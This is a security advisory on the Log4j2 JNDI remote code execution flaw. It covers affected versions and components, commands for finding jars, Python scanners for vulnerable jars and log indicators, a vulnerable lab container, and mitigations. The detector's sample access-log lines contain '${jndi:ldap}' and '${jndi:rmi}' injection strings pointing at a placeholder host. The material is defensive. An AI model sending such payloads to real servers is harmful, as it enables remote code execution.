[Security Advisory] Apache Log4j2 Remote Code Execution Vulnerability
Vulnerability Description
Apache Log4j2 is a Java-based logging library. It is a rewrite of the Log4j framework and adds a large number of features. The framework is widely used in business-system development to record log messages.
In most cases, developers may write error messages derived from user input into the logs. An attacker can abuse this behaviour by sending a specially crafted request, which ultimately triggers remote code execution. Because the vulnerability affects an extremely wide range of software, users are advised to check for it promptly; analysis by the 白帽汇 (BaiMaoHui) Security Research Institute has confirmed that many popular systems on the market are affected.
Severity: Critical
Scope of Impact
Apache Log4j 2.x < 2.15.0-rc2
Known Affected Components
- Apache Struts2
- Apache Solr
- Apache Flink
- Apache Druid
- flume
- dubbo
- logstash
- VMware Horizon
- VMware vCenter Server
- VMware HCX
- VMware NSX-T Data Center
- VMware Unified Access Gateway
- VMware WorkspaceOne Access
- VMware Identity Manager
- VMware vRealize Operations
- VMware vRealize Operations Cloud Proxy
- VMware vRealize Log Insight
- VMware vRealize Automation
- VMware vRealize Lifecycle Manager
- VMware Telco Cloud Automation
- VMware Site Recovery Manager
- VMware Carbon Black Cloud Workload Appliance
- VMware Carbon Black EDR Server
- VMware Tanzu GemFire
- VMware Tanzu Greenplum
- VMware Tanzu Operations Manager
- VMware Tanzu Application Service for VMs
- VMware Tanzu Kubernetes Grid Integrated Edition
- VMware Tanzu Observability by Wavefront Nozzle
- Healthwatch for Tanzu Application Service
- Spring Cloud Services for VMware Tanzu
- Spring Cloud Gateway for VMware Tanzu
- Spring Cloud Gateway for Kubernetes
- API Portal for VMware Tanzu
- Single Sign-On for VMware Tanzu Application Service
- App Metrics
- VMware vCenter Cloud Gateway
- VMware Tanzu SQL with MySQL for VMs
- VMware vRealize Orchestrator
- VMware Cloud Foundation
- VMware Workspace ONE Access Connector
- VMware Horizon DaaS
- VMware Horizon Cloud Connector
Affected Open-Source Components
Project | Repository | Affected versions |
---|---|---|
elasticsearch(org.elasticsearch) | https://github.com/elastic/elasticsearch | 8.0.0-alpha2 and others (100 total) |
spring-webflux(org.springframework) | https://github.com/spring-projects/spring-framework | 5.2.6.RELEASE and others (40 total) |
druid(com.alibaba) | https://github.com/alibaba/druid | 1.2.8 and others (68 total) |
hystrix-rx-netty-metrics-stream(com.netflix.hystrix) | https://github.com/Netflix/Hystrix | 1.5.4 and others (2 total) |
spring-cloud-starter-alibaba-sentinel(com.alibaba.cloud) | https://github.com/alibaba/spring-cloud-alibaba | 2021.1 and others (14 total) |
spring-boot-starter-ahas-sentinel-client(com.alibaba.csp) | https://github.com/alibaba/Sentinel | 1.3.2 and others (17 total) |
redisson(org.redisson) | https://github.com/redisson/redisson | 2.2.24 and others (3 total) |
HikariCP(com.zaxxer) | https://github.com/brettwooldridge/HikariCP | 5.0.0 and others (27 total) |
zipkin-collector-service(io.zipkin) | https://github.com/openzipkin/zipkin | 1.40.2 and others (27 total) |
mybatis-plus(com.baomidou) | https://github.com/baomidou/mybatis-plus | 3.4.3.4 and others (41 total) |
zuul-sample(com.netflix.zuul) | https://github.com/Netflix/zuul | 2.3.0 and others (10 total) |
watson-data-api-client(com.ibm.watson.data) | https://github.com/OpenAPITools/openapi-generator | 0.1 and others (1 total) |
spring-boot-admin-sample-consul(de.codecentric) | https://github.com/codecentric/spring-boot-admin | 2.5.4 and others (40 total) |
jedis(redis.clients) | https://github.com/redis/jedis | jedis-3.6.2 and others (36 total) |
grpc-benchmarks(io.grpc) | https://github.com/grpc/grpc-java | 1.9.1 and others (65 total) |
ktor-client-json-tests(io.ktor) | https://github.com/ktorio/ktor | 1.6.7 and others (32 total) |
gitbucket_2.13(io.github.gitbucket) | https://github.com/gitbucket/gitbucket | 4.32.0 and others (27 total) |
finagle-zipkin_2.12(com.twitter) | https://github.com/twitter/finagle | 7.1.0 and others (56 total) |
resilience4j-vertx(io.github.resilience4j) | https://github.com/resilience4j/resilience4j | 0.9.0 and others (9 total) |
elasticsearch-sql(org.nlpcn) | https://github.com/NLPchina/elasticsearch-sql | 6.8.13.0 and others (9 total) |
exposed-spring-boot-starter(org.jetbrains.exposed) | https://github.com/JetBrains/Exposed | 0.36.2 and others (11 total) |
blade-sql2o(com.bladejava) | https://github.com/lets-blade/blade | 1.2.9 and others (1 total) |
netty-socketio(com.corundumstudio.socketio) | https://github.com/mrniko/netty-socketio | 1.7.19 and others (8 total) |
springfox-swagger2(io.springfox) | https://github.com/springfox/springfox | 2.10.5 and others (6 total) |
main_2.12(org.scala-sbt) | https://github.com/sbt/sbt | 1.6.0-RC1 and others (88 total) |
lettuce-core(io.lettuce) | https://github.com/lettuce-io/lettuce-core | 6.1.5.RELEASE and others (42 total) |
repository-azure(org.opensearch.plugin) | https://github.com/opensearch-project/OpenSearch | 1.2.0 and others (3 total) |
reactor-test(io.projectreactor) | https://github.com/reactor/reactor-core | 3.3.4.RELEASE and others (3 total) |
corda-webserver-impl(net.corda) | https://github.com/corda/corda | corda-3.0 and others (32 total) |
conductor-redis-persistence(com.netflix.conductor) | https://github.com/Netflix/conductor | 3.3.6 and others (100 total) |
armeria(com.linecorp.armeria) | https://github.com/line/armeria | 0.26.1.Final and others (2 total) |
breeze-parent_2.13(org.scalanlp) | https://github.com/scalanlp/breeze | 2.0.1-RC1 and others (5 total) |
micrometer-core(io.micrometer) | https://github.com/micrometer-metrics/micrometer | 1.8.1 and others (98 total) |
alink_connector_jdbc_sqlite_flink-1.9_2.11(com.alibaba.alink) | https://github.com/alibaba/Alink | 1.5.1 and others (3 total) |
initializr-actuator(io.spring.initializr) | https://github.com/spring-io/initializr | 0.9.0 and others (6 total) |
telegrambots-spring-boot-starter(org.telegram) | https://github.com/rubenlagus/TelegramBots | 4.9.1 and others (17 total) |
spring-data-elasticsearch(org.springframework.data) | https://github.com/spring-projects/spring-data-elasticsearch | 4.3.0 and others (86 total) |
feast-common(dev.feast) | https://github.com/feast-dev/feast | 0.9.2 and others (26 total) |
javamelody-core(net.bull.javamelody) | https://github.com/javamelody/javamelody | 1.88.0 and others (13 total) |
analytics-zoo-bigdl_0.13.0-spark_3.0.0(com.intel.analytics.zoo) | https://github.com/intel-analytics/analytics-zoo | 0.11.0-RC1 and others (4 total) |
scio-tensorflow_2.13(com.spotify) | https://github.com/spotify/scio | 0.9.6 and others (97 total) |
grpc-client-spring-boot-autoconfigure(net.devh) | https://github.com/yidongnan/grpc-spring-boot-starter | 2.9.0.RELEASE and others (16 total) |
inject-server_2.12(com.twitter) | https://github.com/twitter/finatra | 21.9.0 and others (56 total) |
client-java-examples(io.kubernetes) | https://github.com/kubernetes-client/java | 8.0.2 and others (1 total) |
reactivesocket-tck-drivers(io.reactivesocket) | https://github.com/rsocket/rsocket-java | 0.6.0 and others (1 total) |
jest-droid(io.searchbox) | https://github.com/searchbox-io/Jest | 6.3.1 and others (8 total) |
graphql-dgs-example-java-webflux(com.netflix.graphql.dgs) | https://github.com/Netflix/dgs-framework | 4.9.7 and others (36 total) |
quill-jdbc-monix_2.11(io.getquill) | https://github.com/getquill/quill | 3.9.0 and others (62 total) |
doobie-quill_2.12(org.tpolecat) | https://github.com/tpolecat/doobie | 1.0.0-RC1 and others (61 total) |
http4k(org.http4k) | https://github.com/http4k/http4k | 4.3.4.1 and others (3 total) |
elasticsearch-hadoop(org.elasticsearch) | https://github.com/elastic/elasticsearch-hadoop | 8.0.0-beta1 and others (100 total) |
sbt-shading(io.get-coursier) | https://github.com/coursier/coursier | 1.0.0-RC8 and others (1 total) |
spark-cassandra-connector-unshaded_2.10(com.datastax.spark) | https://github.com/datastax/spark-cassandra-connector | 2.0.9 and others (54 total) |
webdrivermanager(io.github.bonigarcia) | https://github.com/bonigarcia/webdrivermanager | 4.0.0 and others (15 total) |
common-auth-v3(com.tencent.bk.devops.ci.common) | https://github.com/Tencent/bk-ci | 1.2.0-rc.7-RELEASE and others (3 total) |
reactor-netty(io.projectreactor.netty) | https://github.com/reactor/reactor-netty | 1.0.9 and others (75 total) |
evcache-client-sample(com.netflix.evcache) | https://github.com/Netflix/EVCache | 5.18.9 and others (63 total) |
xtdb-test(com.xtdb) | https://github.com/xtdb/xtdb | 1.20.0 and others (9 total) |
transport-netty4(com.strapdata.elasticsearch.plugin) | https://github.com/strapdata/elassandra | 6.2.3.31 and others (14 total) |
sbt-metals(org.scalameta) | https://github.com/scalameta/metals | 0.9.9 and others (17 total) |
elastic4s-embedded_2.12(com.sksamuel.elastic4s) | https://github.com/sksamuel/elastic4s | 6.7.8 and others (100 total) |
genie-agent(com.netflix.genie) | https://github.com/Netflix/genie | 4.0.4 and others (100 total) |
spring-kafka(org.springframework.kafka) | https://github.com/spring-projects/spring-kafka | 2.7.9 and others (79 total) |
db-async-common_2.13(com.dripower) | https://github.com/mauricio/postgresql-async | 0.3.109 and others (19 total) |
selenide(com.codeborne) | https://github.com/selenide/selenide | 5.25.0-selenium-4.0.0-rc-2 and others (18 total) |
cloudfoundry-identity-server(org.cloudfoundry.identity) | https://github.com/cloudfoundry/uaa | 4.30.0 and others (1 total) |
servo-atlas(com.netflix.servo) | https://github.com/Netflix/servo | 0.13.2 and others (20 total) |
rxnetty-spectator-tcp(io.reactivex) | https://github.com/ReactiveX/RxNetty | 0.5.3-rc.4 and others (12 total) |
mleap-tensorflow_2.10(ml.combust.mleap) | https://github.com/combust/mleap | 0.9.6 and others (25 total) |
spark-testing-base_2.12(com.holdenkarau) | https://github.com/holdenk/spark-testing-base | 2.4.4_1.1.1 and others (100 total) |
graphql-kotlin-spring-client(com.expediagroup) | https://github.com/ExpediaGroup/graphql-kotlin | 5.0.0-alpha.0 and others (20 total) |
graphql-spring-boot-test-autoconfigure(com.graphql-java-kickstart) | https://github.com/graphql-java-kickstart/graphql-spring-boot | 8.1.1 and others (33 total) |
discord4j-rest(com.discord4j) | https://github.com/Discord4J/Discord4J | 3.2.1 and others (15 total) |
twitter-server-logback-classic_2.13(com.twitter) | https://github.com/twitter/twitter-server | 21.9.0 and others (54 total) |
synthea(org.mitre.synthea) | https://github.com/synthetichealth/synthea | 2.7.0 and others (2 total) |
spring-integration-redis(org.springframework.integration) | https://github.com/spring-projects/spring-integration | 5.5.6 and others (30 total) |
cyclops-reactor-integration(com.oath.cyclops) | https://github.com/aol/cyclops | 10.4.0 and others (1 total) |
akka-stream-alpakka-geode_2.12(com.lightbend.akka) | https://github.com/akka/alpakka | 1.0-M1 and others (13 total) |
mantis-client(io.mantisrx) | https://github.com/Netflix/mantis | 1.3.9 and others (83 total) |
mybatis-generator-plugin(com.itfsw) | https://github.com/itfsw/mybatis-generator-plugin | 1.2.9 and others (31 total) |
ktorm-support-sqlserver(org.ktorm) | https://github.com/kotlin-orm/ktorm | 3.3.0 and others (11 total) |
gatk(org.broadinstitute) | https://github.com/broadinstitute/gatk | 4.beta.2 and others (39 total) |
azure-messaging-servicebus(com.azure) | https://github.com/Azure/azure-sdk-for-java | 7.5.1 and others (100 total) |
mica-metrics(net.dreamlu) | https://github.com/lets-mica/mica | 2.5.7 and others (7 total) |
shiro-redis(org.crazycake) | https://github.com/alexxiyang/shiro-redis | 3.3.1 and others (2 total) |
enumeratum-play_2.12(com.beachape) | https://github.com/lloydmeta/enumeratum | 1.5.16 and others (2 total) |
jdonframework(org.jdon) | https://github.com/banq/jdonframework | 6.6.8 and others (1 total) |
weid-java-sdk(com.webank) | https://github.com/WeBankBlockchain/WeIdentity | 1.8.1 and others (3 total) |
log-protocol(io.shulie.pradar) | https://github.com/shulieTech/Takin | 2.0.3 and others (3 total) |
micro-boot(com.oath.microservices) | https://github.com/aol/micro-server | 1.2.6 and others (38 total) |
sparkling-water-package_2.11(ai.h2o) | https://github.com/h2oai/sparkling-water | 2.4.10 and others (36 total) |
scalatest_2.13(au.com.dius.pact.provider) | https://github.com/pact-foundation/pact-jvm | 4.2.4 and others (5 total) |
mssql-jdbc(com.microsoft.sqlserver) | https://github.com/microsoft/mssql-jdbc | 8.3.0.jre11-preview and others (100 total) |
elide-spring-boot-starter(com.yahoo.elide) | https://github.com/yahoo/elide | 6.0.3 and others (45 total) |
kafka-connect-elastic5(com.datamountaineer) | https://github.com/lensesio/stream-reactor | 1.2.0 and others (5 total) |
kvision-server-spring-boot-jvm(io.kvision) | https://github.com/rjaros/kvision | 5.4.3 and others (9 total) |
r2dbc-postgresql(org.postgresql) | https://github.com/pgjdbc/r2dbc-postgresql | 0.9.0.RC1 and others (8 total) |
play-slick-evolutions_2.13(com.typesafe.play) | https://github.com/playframework/play-slick | 5.0.0-RC3 and others (29 total) |
sbt-bloop-core(ch.epfl.scala) | https://github.com/scalacenter/bloop | 1.4.8-43-c2d941d9 and others (29 total) |
jcseg-elasticsearch(org.lionsoul) | https://github.com/lionsoul2014/jcseg | 2.6.2 and others (7 total) |
For more affected components, use the lookup service at: https://log4j2.huoxian.cn/
Vulnerability Check
Code check: inspect pom.xml for dependencies on org.apache.logging.log4j or org.apache.logging.log4j2.
Linux:
sudo find / -name "*log4j-*.jar"
Windows:
search the filesystem for files matching *log4j*.jar
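As an added example that is not part of the original advisory, the following Python scanner goes one step beyond the find command above: it walks a directory tree for log4j jars, reads the version from the filename or from META-INF/MANIFEST.MF, and reports whether the JndiLookup class that performs the lookup is still inside the jar. The three jars that demo() builds are constructed for demonstration and are not real Log4j builds.

```python
import os, re, tempfile, zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"  # class doing the lookup
FIXED = (2, 15, 0)  # first fixed release named by the advisory (2.15.0-rc2)

def parse_version(text):
    """(major, minor, patch) from e.g. log4j-core-2.14.1.jar or a manifest line, else None."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return tuple(int(x) for x in m.groups()) if m else None

def inspect_jar(path):
    """Version from the filename, else from the manifest; flagged only if JndiLookup.class is present and version < 2.15.0 or unknown."""
    version = parse_version(os.path.basename(path))
    with zipfile.ZipFile(path) as zf:
        names = zf.namelist()
        has_jndi = JNDI_CLASS in names
        if version is None and "META-INF/MANIFEST.MF" in names:
            for line in zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace").splitlines():
                if line.startswith("Implementation-Version:"):
                    version = parse_version(line)
    return {"path": path, "version": version, "jndi_lookup": has_jndi,
            "vulnerable": has_jndi and (version is None or version < FIXED)}

def scan(root):
    """Walk root, the counterpart of the advisory's find / -name "*log4j-*.jar"."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if "log4j" in name.lower() and name.lower().endswith(".jar"):
                hits.append(inspect_jar(os.path.join(dirpath, name)))
    return sorted(hits, key=lambda h: h["path"])

def make_sample_jar(directory, name, manifest_version=None, with_jndi=True):
    """Constructed sample jar (not a real Log4j build): optional manifest plus an empty JndiLookup.class entry."""
    path = os.path.join(directory, name)
    with zipfile.ZipFile(path, "w") as zf:
        if manifest_version:
            zf.writestr("META-INF/MANIFEST.MF", f"Implementation-Version: {manifest_version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return path

def demo():
    """Three constructed jars: vulnerable, patched (version only in the manifest), and an old build with JndiLookup.class removed."""
    root = tempfile.mkdtemp()
    make_sample_jar(root, "log4j-core-2.14.1.jar")
    make_sample_jar(root, "log4j-core.jar", manifest_version="2.15.0")
    make_sample_jar(root, "log4j-core-2.13.0.jar", with_jndi=False)
    return {os.path.basename(h["path"]): h["vulnerable"] for h in scan(root)}
```

Run scan("/") on a real host to get the same per-jar verdicts for every log4j jar found; the version-only check of the find command cannot tell a jar whose JndiLookup.class was stripped from an unpatched one.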
Attack Check
Log check:
Before exploitation, attackers usually scan and probe using dnslog-style callbacks. For the common exploitation methods, search the application's error logs for the following keywords:
"javax.naming.CommunicationException"
"javax.naming.NamingException: problem generating object using object factory"
"Error looking up JNDI resource"
Traffic check:
An attacker's request may contain the strings "${jndi:rmi" or "${jndi:ldap"; search captured traffic and access logs for these keywords.
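An added example (not part of the original advisory) that runs the two checks above over constructed sample log lines: the application-log indicators are matched literally, and access-log lines are URL-decoded before matching the ${jndi: markers, since web servers usually record the encoded form of a request. The log lines and the host name example.invalid are constructed for this example.

```python
import re
from urllib.parse import unquote

# Exception texts the advisory says to look for in application error logs.
LOG_INDICATORS = (
    "javax.naming.CommunicationException",
    "javax.naming.NamingException: problem generating object using object factory",
    "Error looking up JNDI resource",
)
# Request markers from the advisory's traffic check, matched case-insensitively.
TRAFFIC_PATTERN = re.compile(r"\$\{jndi:(?:rmi|ldap)", re.IGNORECASE)

# Constructed sample lines (not real captures); example.invalid is a reserved test host.
SAMPLE_APP_LOG = """\
2021-12-10 10:00:01 INFO  Started application
2021-12-10 10:00:05 ERROR javax.naming.CommunicationException: example.invalid:1389
2021-12-10 10:00:05 WARN  Error looking up JNDI resource [ldap://example.invalid:1389/a]
2021-12-10 10:00:07 INFO  Health check ok
"""
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"
10.0.0.9 - - "GET /api?q=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 "curl/7.79"
10.0.0.6 - - "GET /static/app.js HTTP/1.1" 200 "Mozilla/5.0"
"""

def scan_app_log(text):
    """Return (line number, indicator) for each application-log line carrying one of the advisory's JNDI error strings."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        hits.extend((n, ind) for ind in LOG_INDICATORS if ind in line)
    return hits

def scan_access_log(text):
    """Return (line number, marker) for request lines carrying ${jndi:rmi or ${jndi:ldap, after URL-decoding each line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = TRAFFIC_PATTERN.search(unquote(line))
        if m:
            hits.append((n, m.group(0).lower()))
    return hits
```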
Reproduction
Vulfocus range environment
Vulfocus already provides an integrated Log4j2 environment, which can be launched for testing from the link below:
http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c
You can also pull the environment locally with docker pull vulfocus/log4j2-rce-2021-12-09:latest and start it with: docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest
Remediation
1. Block outbound connections from servers running log4j, and upgrade the JDK to 11.0.1, 8u191, 7u201, 6u211 or later.
2. Upgrade to log4j-2.15.0-rc2:
Download: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
3. Emergency mitigations:
(1) Add the JVM parameter -Dlog4j2.formatMsgNoLookups=true
(2) Set the configuration property log4j2.formatMsgNoLookups=True
(3) Set the system environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS to true
References
[1] https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
[2] [LOG4J2-3201] Limit the protocols jNDI can use and restrict LDAP. - ASF JIRA (apache.org)
[4] https://mp.weixin.qq.com/s/wC7mrK1Y4DYz9_yW4fLzbw
[5] https://help.aliyun.com/noticelist/articleid/1060971232.html
[6] https://mp.weixin.qq.com/s/C4zeXHKHDqPeRuLytO7Fzw
白帽汇 (BaiMaoHui) works in information security, focusing on security big data and enterprise threat intelligence.
Company products: FOFA (cyberspace security search engine), FOEYE (cyberspace retrieval system), NOSEC (security information platform).
Services: cyberspace mapping, enterprise asset collection, enterprise threat intelligence, and incident response.